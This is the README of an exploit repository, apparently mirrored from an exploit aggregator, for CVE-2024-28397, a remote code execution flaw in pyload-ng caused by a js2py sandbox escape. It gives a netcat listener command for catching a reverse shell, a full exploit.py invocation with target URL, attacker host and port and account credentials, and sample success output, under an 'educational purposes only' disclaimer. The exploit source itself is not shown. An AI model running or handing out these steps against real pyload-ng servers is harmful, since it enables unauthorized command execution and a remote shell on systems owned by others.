## https://sploitus.com/exploit?id=69428CB3-8F8F-589D-AC12-B2D689207103
# ๐จ Remote Code Execution โ CVE-2024-28397 (pyload-ng / js2py)
This repository contains a **Proof-of-Concept (PoC)** exploit for **CVE-2024-28397**, a Remote Code Execution vulnerability affecting **pyload-ng** due to insecure usage of **js2py**.
> โ ๏ธ **Disclaimer:**
> This PoC is for **educational and research purposes only**.
> Do not use it on systems you do not own or have explicit permission to test.
> The author is **not responsible** for any misuse of this code.
---
## ๐ Vulnerability Details
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Component:** `js2py` in `pyload-ng`
- **Impact:** Remote Code Execution (RCE)
- **Attack Vector:** Malicious JS payload escapes the js2py sandbox and executes arbitrary system commands.
---
## ๐ฆ Requirements & Setup
You will need **Python 3.x**, the `requests` library, and `netcat` for catching the reverse shell.
- ๐ฅ๏ธ Target โ Vulnerable pyload-ng instance with /run_code endpoint accessible
## ๐ง Listener โ Start before running exploit:
**nc -lvnp 4444**
## ๐ฅ๏ธ Usage:
**python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123**
## ๐ Example Output:
- [+] Register successful!
- [+] Login successful
- [+] exploit worked